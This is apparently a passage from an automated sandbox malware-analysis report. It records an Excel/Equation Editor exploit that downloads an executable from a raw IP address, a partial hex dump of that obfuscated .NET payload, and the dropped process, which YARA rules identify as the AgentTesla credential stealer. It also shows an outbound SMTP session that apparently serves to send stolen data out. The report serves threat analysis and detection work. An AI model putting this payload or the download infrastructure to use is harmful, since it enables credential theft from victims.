                                                                Jul 26, 2022 17:45:46.723690987 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.723746061 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.723800898 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.723815918 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.723843098 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.723858118 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.723887920 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.723915100 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.723932028 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.723970890 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.723982096 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724024057 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724028111 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724081993 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724102020 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724138975 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724148989 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724200010 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724229097 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724253893 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724270105 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724309921 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724323034 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724361897 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724365950 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724420071 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724462986 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724476099 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724487066 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724533081 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724541903 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724591017 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724596977 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724648952 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724668980 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724704981 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724718094 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724766016 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724767923 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724822044 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724863052 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724895000 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724901915 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.724936962 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.724977016 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:51.295245886 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:51.295406103 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:54.614252090 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:46:04.088269949 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:04.242913008 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:04.243017912 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:04.476099014 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:04.476527929 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:04.631335020 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:04.631625891 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:04.788146019 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:04.848582029 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:05.013525009 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:05.013549089 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:05.013564110 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:05.013572931 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:05.013747931 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:05.017051935 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:05.032965899 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:05.188159943 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:05.394876003 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:08.494426966 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:08.652467012 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:08.659001112 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:08.814361095 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:08.815532923 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:08.988221884 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:08.989084005 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:09.143805027 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:09.195628881 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:09.379164934 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:09.379498005 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:09.534507990 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:09.568049908 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:09.568239927 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:09.571611881 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:09.571775913 CEST49174587192.168.2.22104.149.221.234
                                                                Jul 26, 2022 17:46:09.724179029 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:09.724205971 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:09.726213932 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:09.726530075 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:09.920299053 CEST58749174104.149.221.234192.168.2.22
                                                                Jul 26, 2022 17:46:10.137782097 CEST49174587192.168.2.22104.149.221.234

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jul 26, 2022 17:46:03.152249098 CEST5586853192.168.2.228.8.8.8
                                                                Jul 26, 2022 17:46:03.539679050 CEST53558688.8.8.8192.168.2.22
                                                                Jul 26, 2022 17:46:03.542771101 CEST5586853192.168.2.228.8.8.8
                                                                Jul 26, 2022 17:46:03.933562994 CEST53558688.8.8.8192.168.2.22
                                                                Jul 26, 2022 17:46:03.936980963 CEST5586853192.168.2.228.8.8.8
                                                                Jul 26, 2022 17:46:03.956551075 CEST53558688.8.8.8192.168.2.22
                                                                Jul 26, 2022 17:46:03.962773085 CEST5586853192.168.2.228.8.8.8
                                                                Jul 26, 2022 17:46:03.982003927 CEST53558688.8.8.8192.168.2.22
                                                                Jul 26, 2022 17:46:04.040501118 CEST4968853192.168.2.228.8.8.8
                                                                Jul 26, 2022 17:46:04.059765100 CEST53496888.8.8.8192.168.2.22

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Jul 26, 2022 17:46:03.152249098 CEST192.168.2.228.8.8.80xd84fStandard query (0)mail.bluemix.clA (IP address)IN (0x0001)
                                                                Jul 26, 2022 17:46:03.542771101 CEST192.168.2.228.8.8.80xd84fStandard query (0)mail.bluemix.clA (IP address)IN (0x0001)
                                                                Jul 26, 2022 17:46:03.936980963 CEST192.168.2.228.8.8.80xd84fStandard query (0)mail.bluemix.clA (IP address)IN (0x0001)
                                                                Jul 26, 2022 17:46:03.962773085 CEST192.168.2.228.8.8.80xd84fStandard query (0)mail.bluemix.clA (IP address)IN (0x0001)
                                                                Jul 26, 2022 17:46:04.040501118 CEST192.168.2.228.8.8.80x32d3Standard query (0)mail.bluemix.clA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Jul 26, 2022 17:46:03.539679050 CEST8.8.8.8192.168.2.220xd84fNo error (0)mail.bluemix.clbluemix.clCNAME (Canonical name)IN (0x0001)
                                                                Jul 26, 2022 17:46:03.539679050 CEST8.8.8.8192.168.2.220xd84fNo error (0)bluemix.cl104.149.221.234A (IP address)IN (0x0001)
                                                                Jul 26, 2022 17:46:03.933562994 CEST8.8.8.8192.168.2.220xd84fNo error (0)mail.bluemix.clbluemix.clCNAME (Canonical name)IN (0x0001)
                                                                Jul 26, 2022 17:46:03.933562994 CEST8.8.8.8192.168.2.220xd84fNo error (0)bluemix.cl104.149.221.234A (IP address)IN (0x0001)
                                                                Jul 26, 2022 17:46:03.956551075 CEST8.8.8.8192.168.2.220xd84fNo error (0)mail.bluemix.clbluemix.clCNAME (Canonical name)IN (0x0001)
                                                                Jul 26, 2022 17:46:03.956551075 CEST8.8.8.8192.168.2.220xd84fNo error (0)bluemix.cl104.149.221.234A (IP address)IN (0x0001)
                                                                Jul 26, 2022 17:46:03.982003927 CEST8.8.8.8192.168.2.220xd84fNo error (0)mail.bluemix.clbluemix.clCNAME (Canonical name)IN (0x0001)
                                                                Jul 26, 2022 17:46:03.982003927 CEST8.8.8.8192.168.2.220xd84fNo error (0)bluemix.cl104.149.221.234A (IP address)IN (0x0001)
                                                                Jul 26, 2022 17:46:04.059765100 CEST8.8.8.8192.168.2.220x32d3No error (0)mail.bluemix.clbluemix.clCNAME (Canonical name)IN (0x0001)
                                                                Jul 26, 2022 17:46:04.059765100 CEST8.8.8.8192.168.2.220x32d3No error (0)bluemix.cl104.149.221.234A (IP address)IN (0x0001)
                                                                Jul 26, 2022 17:46:06.001419067 CEST8.8.8.8192.168.2.220xd688No error (0)au.c-0001.c-msedge.netc-0001.c-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                Jul 26, 2022 17:46:06.001419067 CEST8.8.8.8192.168.2.220xd688No error (0)c-0001.c-msedge.net13.107.4.50A (IP address)IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • 107.174.138.192

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.2249173107.174.138.19280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                TimestampkBytes transferredDirectionData
                                                                Jul 26, 2022 17:45:45.684885979 CEST0OUTGET /ObliNMm2L89TSKT.exe HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Host: 107.174.138.192
                                                                Connection: Keep-Alive
                                                                Jul 26, 2022 17:45:45.802946091 CEST1INHTTP/1.1 200 OK
                                                                Date: Tue, 26 Jul 2022 15:45:45 GMT
                                                                Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                                                Last-Modified: Tue, 26 Jul 2022 01:46:09 GMT
                                                                ETag: "aa200-5e4ab76f7064a"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 696832
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-msdownload
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d6 44 df 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 9a 0a 00 00 06 00 00 00 00 00 00 6e b9 0a 00 00 20 00 00 00 c0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c b9 0a 00 4f 00 00 00 00 c0 0a 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 99 0a 00 00 20 00 00 00 9a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 03 00 00 00 c0 0a 00 00 04 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0a 00 00 02 00 00 00 a0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 b9 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 a5 08 00 54 13 02 00 03 00 00 00 19 01 00 06 d8 c7 00 00 f0 dd 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 06 00 00 00 01 00 00 11 28 02 00 00 06 2a 00 00 13 30 05 00 29 01 00 00 02 00 00 11 72 01 00 00 70 0a 06 72 09 00 00 70 28 08 00 00 06 28 09 00 00 06 3a df 00 00 00 20 63 84 df 1a 20 ee 9d 0a 5f 61 25 0c 1e 5e 45 08 00 00 00 35 00 00 00 05 00 00 00 cc ff ff ff 51 00 00 00 ab 00 00 00 7d 00 00 00 bb 00 00 00 61 00 00 00 38 b6 00 00 00 07 28 0d 00 00 06 28 0e 00 00 06 72 1d 00 00 70 28 0f 00 00 06 2c 08 20 a8 01 f7 f2 25 2b 06 20 f9 6d 00 8b 25 26 08 20 f9 5c 80 be 5a 61 2b 9c 07 2d 08 20 b0 97 36 03 25 2b 06 20 3f d7 03 54 25 26 08 20 8e 45 d7 a6 5a 61 2b 80 28 03 00 00 06 0b 20 3e a2 50 5b 38 70 ff ff ff 72 29 00 00 70 28 10 00 00 06 08 20 52 80 cd 65 5a 20 5e 5b 26 5f 61 38 54 ff ff ff 06 72 2b 00 00 70 28 0a 00 00 06 28 0b 00 00 06 2d 08 20 8c fe 22 5f 25 2b 06 20 0b 18 da 51 25 26 08 20 5d f1 60 48 5a 61 38 26 ff ff ff 14 28 0c 00 00 06 20 b5 fb 7a 67 38 16 ff ff ff 14 fe 06 07 00 00 06 73 25 00 00 0a 28 11 00 00 06 25 17 28 12 00 00 06 14 28 13 00 00 06 2a 00 00 00 13 30 03 00 0b 00 00 00 01 00 00 11 7f 01 00 00 04 28 27 00 00 06 2a 00 1b 30 05 00 1a 02 00 00 03 00 00 11 02 75 04 00 00 01 0a 06 2d 4a 20 39 46 a3 ff 20 bc f8 10 c7 61 25 0b 1f 0c 5e 45 0c 00 00 00 05 00 00 00 53 01 00 00 a3 00 00 00 37 01 00 00 d0
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELDbPn @ @O H.textt `.rsrc@@.reloc@BPHT0(*0)rprp((: c _a%^E5Q}a8((rp(, %+ m%& \Za+- 6%+ ?T%& EZa+( >P[8pr)p( ReZ ^[&_a8Tr+p((- "_%+ Q%& ]`HZa8&( zg8s%(%((*0('*0u-J 9F a%^ES7
                                                                Jul 26, 2022 17:45:45.802973986 CEST3INData Raw: 00 00 00 10 01 00 00 bb ff ff ff 88 00 00 00 bc 00 00 00 ec 00 00 00 1d 00 00 00 3d 00 00 00 38 4e 01 00 00 28 19 00 00 06 2d 08 20 72 ab ac a0 25 2b 06 20 e8 39 45 90 25 26 2b a3 28 1a 00 00 06 2c 08 20 ce ea 13 e2 25 2b 06 20 c1 09 4e d3 25 26
                                                                Data Ascii: =8N(- r%+ 9E%&+(, %+ N%& uEZa+(%(~&(',r)p(( r)p(((1 %+ 8/%&88(- x%+ 3%&8( YZ _a8r)p( 8r)
                                                                Jul 26, 2022 17:45:45.802989960 CEST4INData Raw: 0a 80 0a 00 00 04 73 43 00 00 0a 80 0b 00 00 04 06 20 d2 7d f5 be 5a 20 f9 fa 22 59 61 2b bc 73 44 00 00 0a 80 0c 00 00 04 06 20 bd 06 48 23 5a 20 7a 2c 54 01 61 2b a3 2a 00 13 30 03 00 3f 00 00 00 05 00 00 11 00 20 f6 e9 70 73 20 04 6c 19 0c 61
                                                                Data Ascii: sC }Z "Ya+sD H#Z z,Ta+*0? ps la%^E+~oE Z lna+*0R uA a%^E++)~oF HZ hua+ qMZ 4a+*0?
                                                                Jul 26, 2022 17:45:45.803002119 CEST5INData Raw: 00 00 0a 20 1b 9c 5b e8 20 b9 1d af 96 61 25 0a 19 5e 45 03 00 00 00 12 00 00 00 02 00 00 00 e0 ff ff ff 2b 10 00 06 20 b5 cd 10 9f 5a 20 ab fb 5e d1 61 2b d3 2a 00 00 13 30 04 00 12 00 00 00 0b 00 00 11 00 02 03 28 53 00 00 06 28 54 00 00 06 0a
                                                                Data Ascii: [ a%^E+ Z ^a+*0(S(T+*0; #b a%^E+(U Z a+*0?(H a%^E+ DwaZ Va+*0;
                                                                Jul 26, 2022 17:45:45.803016901 CEST7INData Raw: 04 00 08 00 00 00 01 00 00 11 02 03 28 02 00 00 0a 2a 13 30 03 00 07 00 00 00 01 00 00 11 02 28 03 00 00 0a 2a 00 13 30 03 00 07 00 00 00 01 00 00 11 02 28 04 00 00 0a 2a 00 13 30 03 00 07 00 00 00 01 00 00 11 02 73 5a 00 00 0a 2a 00 13 30 04 00
                                                                Data Ascii: (*0(*0(*0sZ*0(_(`+*0(a+*0(b+*0; , b1N:a%^E+(c iZ ]a+*0U
                                                                Jul 26, 2022 17:45:45.803029060 CEST8INData Raw: 45 04 00 00 00 26 00 00 00 02 00 00 00 17 00 00 00 dc ff ff ff 2b 24 7e 15 00 00 04 0a 07 20 55 f2 d9 0f 5a 20 87 f9 5f e7 61 2b ca 07 20 3f 0d 2c ea 5a 20 7e 94 f3 e8 61 2b bb 06 2a 00 00 00 13 30 04 00 45 00 00 00 0e 00 00 11 00 02 72 b1 01 00
                                                                Data Ascii: E&+$~ UZ _a+ ?,Z ~a+*0Erp(v(w q% |fa%^E+ hZ B%a+*0(a*0ob*0(c*0: } Ja%^E
                                                                Jul 26, 2022 17:45:45.803041935 CEST10INData Raw: 04 00 00 46 09 00 00 36 07 00 00 ae 0c 00 00 31 02 00 00 d3 0d 00 00 f3 09 00 00 5a 03 00 00 60 01 00 00 55 07 00 00 bf 01 00 00 15 01 00 00 00 10 00 00 4f 0c 00 00 c5 05 00 00 75 0b 00 00 8b 0d 00 00 ff 08 00 00 8f 0f 00 00 75 0a 00 00 74 07 00
                                                                Data Ascii: F61Z`UOuut@b|S0O;?O|:'S@sn
                                                                Jul 26, 2022 17:45:45.803056002 CEST11INData Raw: 70 28 a4 00 00 06 07 20 8b 0a 4a 32 5a 20 88 07 d8 8e 61 38 be f9 ff ff 00 07 20 12 7c 90 a4 5a 20 b4 66 66 31 61 38 ab f9 ff ff 00 07 20 c2 3e 34 6a 5a 20 1c b8 6a 07 61 38 98 f9 ff ff 02 28 7f 00 00 06 20 01 01 00 00 1f 11 73 66 00 00 0a 28 a9
                                                                Data Ascii: p( J2Z a8 |Z ff1a8 >4jZ ja8( sf( Z WF?a8o({(" A((&({ sf( EZ *\a8' Z *Ba8(( Z ra8({((
                                                                Jul 26, 2022 17:45:45.803071976 CEST12INData Raw: 2d 5d 23 61 38 93 f4 ff ff 00 02 28 7f 00 00 06 20 88 00 00 00 16 73 67 00 00 0a 28 a3 00 00 06 07 20 6f db 1c 9e 5a 20 da db b8 6f 61 38 6a f4 ff ff 00 07 20 d7 1c 00 f5 5a 20 ef d5 8f 95 61 38 57 f4 ff ff 02 28 c2 00 00 06 02 28 7b 00 00 06 28
                                                                Data Ascii: -]#a8( sg( oZ oa8j Z a8W(({( )Z =a84 HZ +va8! ^j7Z na8(sj( VvZ O2a8((({( "Z koa8(sj(
                                                                Jul 26, 2022 17:45:45.803087950 CEST14INData Raw: df 72 03 ca 61 38 58 ef ff ff 02 28 87 00 00 06 72 59 03 00 70 28 bd 00 00 06 07 20 f9 61 6e e1 5a 20 86 f7 f1 32 61 38 36 ef ff ff 02 28 7f 00 00 06 16 28 aa 00 00 06 07 20 e8 b8 be 9f 5a 20 54 28 cd d6 61 38 18 ef ff ff 02 28 7f 00 00 06 1b 28
                                                                Data Ascii: ra8X(rYp( anZ 2a86(( Z T(a8(( UZ (DQoa8((((( gsg( Yw+Z 2saa8((~ #Z z&a8 Z $a8( {sf(
                                                                Jul 26, 2022 17:45:45.917804956 CEST15INData Raw: 6f 6d 00 00 0a 2a 13 30 04 00 08 00 00 00 01 00 00 11 02 03 6f 6e 00 00 0a 2a 13 30 03 00 07 00 00 00 01 00 00 11 02 73 6f 00 00 0a 2a 00 13 30 03 00 06 00 00 00 01 00 00 11 73 70 00 00 0a 2a 00 00 13 30 03 00 06 00 00 00 01 00 00 11 73 71 00 00
                                                                Data Ascii: om*0on*0so*0sp*0sq*0sr*0ss*0st*0ou*0ov*0(u*0ow*0ox


                                                                SMTP Packets

                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                Jul 26, 2022 17:46:04.476099014 CEST58749174104.149.221.234192.168.2.22220-srv34.benzahosting.cl ESMTP Exim 4.95 #2 Tue, 26 Jul 2022 11:46:04 -0400
                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                220 and/or bulk e-mail.
                                                                Jul 26, 2022 17:46:04.476527929 CEST49174587192.168.2.22104.149.221.234EHLO 899552
                                                                Jul 26, 2022 17:46:04.631335020 CEST58749174104.149.221.234192.168.2.22250-srv34.benzahosting.cl Hello 899552 [102.129.143.3]
                                                                250-SIZE 52428800
                                                                250-8BITMIME
                                                                250-PIPELINING
                                                                250-PIPE_CONNECT
                                                                250-AUTH PLAIN LOGIN
                                                                250-STARTTLS
                                                                250 HELP
                                                                Jul 26, 2022 17:46:04.631625891 CEST49174587192.168.2.22104.149.221.234STARTTLS
                                                                Jul 26, 2022 17:46:04.788146019 CEST58749174104.149.221.234192.168.2.22220 TLS go ahead

                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:17:45:16
                                                                Start date:26/07/2022
                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                Imagebase:0x13f870000
                                                                File size:28253536 bytes
                                                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Target ID:2
                                                                Start time:17:45:41
                                                                Start date:26/07/2022
                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                Imagebase:0x400000
                                                                File size:543304 bytes
                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Target ID:5
                                                                Start time:17:45:47
                                                                Start date:26/07/2022
                                                                Path:C:\Users\Public\regasm_svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\Public\regasm_svchost.exe"
                                                                Imagebase:0x11e0000
                                                                File size:696832 bytes
                                                                MD5 hash:D55AB6E5A705E970AD32977BE467294E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.995073960.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.995073960.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000005.00000002.992466001.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 38%, Metadefender, Browse
                                                                • Detection: 73%, ReversingLabs
                                                                Reputation:low

                                                                General

                                                                Target ID:6
                                                                Start time:17:45:56
                                                                Start date:26/07/2022
                                                                Path:C:\Users\Public\regasm_svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:{path}
                                                                Imagebase:0x11e0000
                                                                File size:696832 bytes
                                                                MD5 hash:D55AB6E5A705E970AD32977BE467294E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.988019664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.988019664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.987598461.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.987598461.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1168247858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.1168247858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.988445692.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.988445692.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1170243625.000000000272A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
